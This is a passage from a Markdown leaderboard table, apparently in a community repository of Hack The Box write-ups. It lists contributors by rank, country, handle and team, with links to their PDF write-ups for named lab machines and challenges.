](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/iknowmag1k/Crysal0_I_know_Mag1k.pdf) [M0rsarchive, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/M0rsarchive/Crysal0_M0rsArchive.pdf) [Money Flowz, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Money_Flowz/Crysal0_Money_Flowz.pdf) [cat](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/mobile/Crysal0_cat.pdf) | 30 | 6 | <img src="./images/countries/switzerland.png" height="24" width="24"> | volken | [<img src="./images/volken.png" height="42" width="42">](https://www.hackthebox.eu/profile/12448) | [SinHack](https://www.hackthebox.eu/home/teams/profile/1313) | [Poison, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Poison/volken-poison.pdf) [Jerry, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jerry/volken-jerry.pdf) [Curling, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Curling/volken-curling.pdf) [Help, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Help/volken-help-unintendedway.pdf) [Irked, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Irked/volken-irked.pdf) [Popcorn](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Popcorn/volken-popcorn.pdf) | [0ld is g0ld, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/0ld_is_g0ld/volken-0ld-is-g0ld.pdf) [Blackhole, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Blackhole/volken-blackhole.pdf) [fs0ciety, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/fs0ciety/volken-fsociety.pdf) [Art, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Art/volken-art.pdf) [Inferno, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Inferno/volken-inferno.pdf) [misDIRection, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/misDIRection/volken-misDIRection.pdf)[Eternal Loop, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Eternal_Loop/volken-Eternal%20Loop.zip) [Longbottom's Locker, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Longbottom-s%20Locker/volken-Longbottom's%20Locker.zip) [Hackerman, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Hackerman/volken-hackerman.pdf) [Raining Blood, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Raining%20Blood/volken-RainingBlood.pdf) [Unified, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Unified/volken-unified.pdf) [Brainy's cipher, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Brainy-s%20Cipher/volken-brainys_cipher.pdf) [Da Vinci, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/DaVinci/volken-Da_vinci.pdf) [Deceiful Batman, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Deceitful_Batman/volken-deceiful_batman.pdf) [Forest, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Forest/volken-forest.pdf) [HDC, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/HDC/volken-hdc.pdf) [Marshal in the Middle, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/volken-marshal_in_the_middle.pdf) [Weak RSA, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Weak%20RSA/volken-weak_rsa.pdf) [Keys, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Keys/volken-keys.pdf) [Retro](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Retro/volken-retro.pdf)| 26 | 7 | <img src="./images/countries/belgium.png" height="24" width="24"> | FlatMarsSociet | [<img src="./images/FlatMarsSociet.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/161927) | Solitaire wolf | [Bastion](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bastion/hackthebox-bastion.pdf), [Networked](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Networked/hackthebox-networked.pdf), [Writeup](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/writeup/hackthebox-writeup.pdf), [Traverxec](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/writeup/hackthebox-traverxec.pdf), [Sauna](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sauna/FlatMarsSociet-hackthebox-sauna.pdf), [OpenAdmin](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OpenAdmin/FlatMarsSociet-hackthebox-openadmin.pdf), [Nest](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Nest/FlatMarsSociet-hackthebox-nest.pdf) | [Easy Phish](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Easy%20Phish/hackthebox-easyphish.pdf), [Infiltration](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Infiltration/hackthebox-infiltration.pdf), [0ld is g0ld](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/0ld_is_g0ld/hackthebox-0ldisg0ld.pdf), [Art](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Art/hackthebox-art.pdf), [Blackhole](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Blackhole/hackthebox-blackhole.pdf), [Croocked Crockford](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Crooked%20Crockford/hackthebox-crookedcrockford.pdf), [Eternal_Loop](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Eternal_Loop/hackthebox-eternalloop.pdf), [Inferno](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Inferno/hackthebox-inferno.pdf), [Longbottom's Locker](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Longbottom-s%20Locker/hackthebox-longbottomslocker.pdf), [M0sarchive](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/M0rsarchive/hackthebox-m0rsarchive.pdf), [fs0ciety](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/fs0ciety/hackthebox-fs0ciety.pdf), [misDIRection](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/misDIRection/hackthebox-misdirection.pdf), [Emdee five for life](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Emdee%20five%20for%20life/hackthebox-emdeefiveforlife.pdf), [Fuzzy](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Fuzzy/hackthebox-fuzzy.pdf), [Cartographer](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/cartographer/hackthebox-cartographer.pdf), [iknowmag1k](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/iknowmag1k/hackthebox-iknowmag1k.pdf), [Lernaean](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/lernaean/hackthebox-lernaean.pdf), [Freelancer](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/freelancer/hackthebox-freelancer.pdf) | 25 8 | <img src="./images/countries/italy.png" height="24" width="24"> | kaosam | [<img src="./images/kaosam.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/149676) | [CameLUG](https://www.hackthebox.eu/home/teams/profile/2125) | [Obscurity, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Obscurity/kaosam-Obscurity.pdf) [Postman, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Postman/kaosam-Postman.pdf) [Openadmin, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OpenAdmin/kaosam-Openadmin.pdf) [Sauna, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sauna/kaosam-Sauna.pdf) [Resolute, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Resolute/kaosam-Resolute.pdf) [Book, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Book/kaosam-Book.pdf) [Forest, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Forest/kaosam-Forest.pdf) [Registry, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Registry/kaosam-Registry.pdf) [Nest, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Nest/kaosam-Nest.pdf) [Control, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Control/kaosam-Control.pdf) [Sniper, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sniper/kaosam-Sniper.pdf) [Traceback, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traceback/kaosam-Traceback.pdf) [Traverxec, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traverxec/kaosam-Traverxec.pdf) [Mango, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mango/kaosam-Mango.pdf) [Servmon, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Servmon/kaosam-Servmon.pdf) [Cascade, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Cascade/kaosam-Cascade.pdf) [Magic, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Magic/kaosam-Magic.pdf) [Remote, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Remote/kaosam-Remote.pdf) [Blunder, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Blunder/kaosam-Blunder.pdf) [Buff, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Buff/kaosam-Buff.pdf) [Doctor, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Doctor/kaosam-Doctor.pdf) [APT, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/APT/kaosam-apt.pdf) [Laboratory](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Laboratory/Kaosam-Laboratory.pdf) | | 23 | 9 | <img src="./images/countries/russia.png" height="24" width="24"> | icebreakcrypt | [<img src="./images/icebreakcrypt.png" height="42" width="42">](https://www.hackthebox.eu/profile/26488) | Solitaire wolf | | [Massacre, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Massacre/icebreakcrypt-massacre.pdf) [Brainy's Cipher, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Brainy-s%20Cipher/icebreakcrypt-Brainy's%20Cipher.pdf) [Widescreen, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Widescreen/Icebreakcrypt-widescreen.pdf) [Blackhole, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Blackhole/Icebreakcrypt-Blackhole.pdf) [Pusheen Loves Graphs, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Pusheen%20Loves%20Graphs/icebreakcrypt-PusheenLovesGraphs.pdf) [Milkshake, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Milkshake/icebreakcrypt-Milkshake.pdf) [Raining blood, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Raining%20Blood/icebreakcrypt-rainingblood.pdf) [The Future Bender, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/TheFutureBender/icebreakcrypt-TheFutureBender.pdf) [Decode me, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Decode%20me/icebreakcrypt-decodeme.pdf) [Baby RE, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Baby%20RE/icebreakcrypt-BabyRE.pdf) [Illumination, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/icebreakcrypt-Illumination.pdf) [Walzer, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Walzer/icebreakcrypt-Walzer.pdf) [Window's Infinity Edge](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/Icebreak-Window's%20Infinity%20Edge.pdf) | 19 | 10 | <img src="./images/countries/france.png" height="24" width="24"> | drx51 | [<img src="./images/drx51.png" height="42" width="42">](https://www.hackthebox.eu/profile/26743) | solitaire wolf | [Celestial,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Celestial/drx51-celestial.pdf) [Dev0ops,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/DevOops/drx51-dev0ops.pdf) [Nibbles,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Nibbles/drx51-nibbles.pdf) [Shocker,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Shocker/drx51-shocker.pdf) [Valentine,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Valentine/drx51-valentine.pdf) [Bashed,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bashed/drx51-bashed.pdf) [Chatterbox,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Chatterbox/drx51-chatterbox.pdf) [Jerry,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jerry/drx51-jerry.pdf) [Canape,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Canape/drx51-canape.pdf) [Sense,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sense/drx51-sense.pdf) [Silo, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Silo/drx51-silo.pdf) [Active, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Active/drx51-active.pdf) [Waldo, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Waldo/drx51-waldo.pdf) [Mischief, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mischief/drx51-mischief.pdf) [Stratosphere, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Stratosphere/drx51-stratosphere.pdf) [Poison, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Poison/drx51-poison.pdf) [Olympus, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Olympus/drx51-olympus.pdf) [Tartarsauce](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/TartarSauce/drx51-tartarsauce.pdf) ||18| 11 | <img src="./images/countries/usa.png" height="24" width="24"> | d0n601 | [<img src="./images/d0n601.png" height="42" width="42">](https://www.hackthebox.eu/profile/133999) | [mystiko](https://www.hackthebox.eu/home/teams/profile/1834) | [Luke](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Luke/d0n601-luke.pdf), [SwagShop, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/SwagShop/HTB_SwagShop-d0n601.pdf) [Writeup](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/writeup/d0n601-writeup.pdf), [Jarvis](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jarvis/HTB_Jarvis-d0n601.pdf), [Haystack](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Haystack/HTB_Haystack-d0n601.pdf), [Craft](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Craft/HTB_Craft-d0n601.pdf), [Traverxec](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traverxec/HTB_Traverxec-d0n601.pdf), [Traceback](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traceback/HTB_Traceback-d0n601.pdf), [Ophiuchi](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ophiuchi/HTB_Ophiuchi-d0n601.pdf), [Armageddon](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Armageddon/HTB_Armageddon-d0n601.pdf)| [snake ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/snake/HTB_Challenge_Snake-d0n601.pdf), [Emdee five for life](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Emdee%20five%20for%20life/HTB_Emdee_five_for_life-d0n601.pdf), [Fuzzy](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/HTB_Fuzzy-d0n601.pdf), [Easy Phish](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Easy%20Phish/HTB_EasyPhish-d0n601.pdf), [Illumination](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/HTB_Illumination-d0n601.pdf) | 15 | 12 | <img src="./images/countries/singapore.png" height="24" width="24"> | wilsonnkwan | [<img src="./images/wilsonnkwan.png" height="42" width="42">](https://www.hackthebox.eu/profile/53043) | [CyberFrenzy](https://www.hackthebox.eu/home/teams/profile/1709) | [Ethereal, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ethereal/wilsonnkwan%20-%20Ethereal.pdf) [Arkham (coauthor mmb), ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Arkham/wilsonnkwan-arkham.pdf) [OneTwoSeven, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OneTwoSeven/Wilson-OneTwoSeven.pdf) [Bastion, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bastion/Wilson-Bastion.pdf) [SwagShop, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/SwagShop/wilsonnkwan-SwagShop.pdf) [Lacasadepapel, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/LaCasaDePapel/wilsonnkwan-Lacasadepapel.pdf) [Ellingson, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ellingson/wilsonnkwan-Ellingson.pdf) [Luke, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Luke/wilsonnkwan-Luke.pdf) [Kryptos, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Kriptos/wilsonnkwan-Kryptos.pdf) [Smasher2, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Smasher2/wilsonnkwan-Smasher2.pdf) [Ghoul, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ghoul/wilsonnkwan-Ghoul.pdf) [Unattended, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Unattended/wilsonnkwan-Unattended.pdf) [Craft](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Craft/wilsonnkwan-Craft.pdf)| | 13 | 13 | <img src="./images/countries/spain.png" height="24" width="24"> | 1v4n | [<img src="./images/1v4n.png" height="42" width="42">](https://www.hackthebox.eu/profile/56686) | solitaire wolf | [Olympus, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Olympus/1v4n-olympus.pdf) [Jerry, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jerry/1v4n-jerry.pdf) [Curling, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Curling/1v4n-curling.pdf) [Netmon](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Netmon/1v4n-netmon.pdf) | [Da Vinci, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/DaVinci/1v4n-davinci.pdf) [Hackerman, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Hackerman/1v4n-Hackerman.pdf) [Forest, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Forest/1v4n-forest.pdf) [fs0ciety, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/fs0ciety/fs0ciety-1v4n.pdf) [Weak RSA, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Weak%20RSA/1v4n-weak_rsa.pdf) [Unified, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Unified/1v4n-unified.pdf) [SickTeacher, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/SickTeacher/1v4n-SickTeacher.pdf) [Milkshake, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Milkshake/1v4n-milkshake.pdf) [Easy Phis](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Easy%20Phish/1v4n-Easy%20Phis.pdf) | 13 | 14 | <img src="./images/countries/Netherlands.png" height="24" width="24"> | IceL0rd | [<img src="./images/IceL0rd.png" height="42" width="42">](https://www.hackthebox.eu/profile/136970) | [BirdsArentReal](https://www.hackthebox.eu/home/teams/profile/1709) | [Arkham, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Arkham/IceL0rd-Arkham.pdf)[Fordwardslash, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/ForwardSlash/IceL0rd-Fordwardslash.pdf)[Tenten, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Tenten/IceL0rd-Tenten.pdf)[Valentine, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Valentine/IceL0rd-Valentine.pdf)[Blackfield, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Blackfield/IceL0rd-Blackfield.pdf)[Fuse, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Fuse/IceL0rd-Fuse.pdf)[Cache, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Cache/IceL0rd-Cache.pdf)[Apocalyst, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Apocalyst/IceL0rd-Apocalyst.pdf)[Cronos, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Cronos/IceL0rd-Cronos.pdf)[Bank, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bank/IceL0rd-Bank.pdf)[Poison, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Poison/IceL0rd-Poison.pdf)[Blunder](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Blunder/IceL0rd-Blunder.pdf) | | 13 | 15 | <img src="./images/countries/Netherlands.png" height="24" width="24"> | Qarnix | [<img src="./images/Qarnix.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/176528) | [Hacky](https://www.hackthebox.eu/home/teams/profile/1958) | [Craft, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Craft/Craft-Writeup-Qarnix.pdf) [Sniper, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sniper/Sniper-Writeup-Qarnix.pdf) [Traverxec, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traverxec/Traverxec-Writeup-Qarnix.pdf) [Worker, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Worker/Worker-Writeup-Qarnix.pdf) [Doctor](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Doctor/Doctor-Writeup-Qarnix.pdf) | [Easy Phish, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Easy%20Phish/Easy-Phish-Writeup-Qarnix.pdf) [Infiltration, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Infiltration/Infiltration-Writeup-Qarnix.pdf) [We Have a Leak, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/We%20Have%20a%20Leak/We-Have-a-Leak-Writeup-Qarnix.pdf) [Breach, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Breach/Breach-Writeup-Qarnix.pdf) [Bank Heist, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Bank%20Heist/Bank-Heist-Writeup-Qarnix.pdf) [USB-Ripper, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/USB-Ripper-Writeup-Qarnix.pdf) [ID Exposed, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/ID%20Exposed/ID-Exposed-Writeup-Qarnix.pdf) [Money Flowz](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Money%20Flowz/Money-Flowz-Writeup-Qarnix.pdf) | 13 | 16 | <img src="./images/countries/spain.png" height="24" width="24"> | KaoRz | [<img src="./images/kaoRz.png" height="42" width="42">](https://www.hackthebox.eu/profile/1742) | [L1k0rD3B3ll0t4](https://www.hackthebox.eu/home/teams/profile/149) | [Olympus, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Olympus/kaorz-olympus.pdf) [Secnotes, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Secnotes/kaorz-secnotes.pdf) [Ypuffy, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ypuffy/kaorz-ypuffy.pdf) [Smasher](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Smasher/kaorz-smasher.zip)| [Find the easy pass, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Find_the_easy_pass/kaoRz_Find_the_easy_pass.pdf) [Impossible Password, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Impossible_password/kaoRz-impossible_password.pdf) [ropme, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/ropme/KaoRz-ropme.zip) [Old Bridge, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/old_bridge/kaorz-old_bridge.zip) [ropmev2, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/ropmev2/KaoRz-ropmev2.zip) [Dream diary 1, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/dream%20diary/KaoRz_Dream_Diary_Chapter_1.zip) [Dream diary 2](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/dream%20diary/KaoRz_Dream_Diary_Chapter_2.zip)| 11 | 17 | <img src="./images/countries/spain.png" height="24" width="24"> | Magichk | [<img src="./images/Magichk.png" height="42" width="42">](https://www.hackthebox.eu/profile/32476) | [Watch4Hack](https://www.hackthebox.eu/home/teams/profile/401) | [Luke, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Luke/Luke%20-%20Writeup-magichk.pdf) [Writeup](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/writeup/magichk-writeup.pdf) | [Please, don't share, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Please-%20don-t%20share/magichk-please_dont_share.pdf) [Bank Heist, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Bank%20Heist/magichk-BankHeist.pdf) [MarketDump, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/magichk-MarketDump.pdf) [Emdee five for life, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Emdee%20five%20for%20life/magichk-Emdee%20five%20for%20life.pdf) [Fuzzy, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Fuzzy/Magichk-Fuzzy.pdf) [August, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/August/magichk-August.pdf) [Easy Phish, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Easy%20Phish/magichk-Easy%20Phish.pdf) [DSYM](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/DSYM/magichk-DSYM.pdf) | 10 | 18 | <img src="./images/countries/usa.png" height="24" width="24"> | pimmytrousers | [<img src="./images/pimmytrousers.png" height="42" width="42">](https://www.hackthebox.eu/profile/7603) | [BitsPlz](https://www.hackthebox.eu/home/teams/profile/732) | [Bounty,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bounty/pimmytrousers-bounty.pdf) [Celestial,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Celestial/pimmytrousers-celestial.pdf) [Jerry,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jerry/pimmytrousers-jerry.pdf) [Poison,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Poison/pimmytrousers-poison.pdf) [Sunday,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sunday/pimmytrousers-sunday.pdf) [Valentine,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Valentine/pimmytrousers-valentine.pdf) [Canape,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Canape/pimmytrousers-canape.pdf) [Stratosphere, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Stratosphere/pimmytrousers-stratosphere.pdf)[Dev0ops](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/DevOops/pimmytrousers-dev0ops.pdf) | | 9 | 19 | <img src="./images/countries/dominican.png" height="24" width="24"> | mcruz | [<img src="./images/mcruz.png" height="42" width="42">](https://www.hackthebox.eu/profile/39624) | solitaire wolf | [Valentine,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Valentine/mcruz-valentine.pdf) [Jerry,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jerry/mcruz-jerry.pdf) [Legacy,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Legacy/mcruz-legacy.pdf) [Poison,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Poison/mcruz-poison.pdf) [Sunday, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sunday/mcruz-sunday.pdf) [Silo, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Silo/mcruz-silo.pdf) [Active, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Active/mcruz-active.pdf) [Hawk, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Hawk/mcruz-hawk.pdf) [Querier](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Querier/mcruz-querier.pdf)| | 9 | 20 | <img 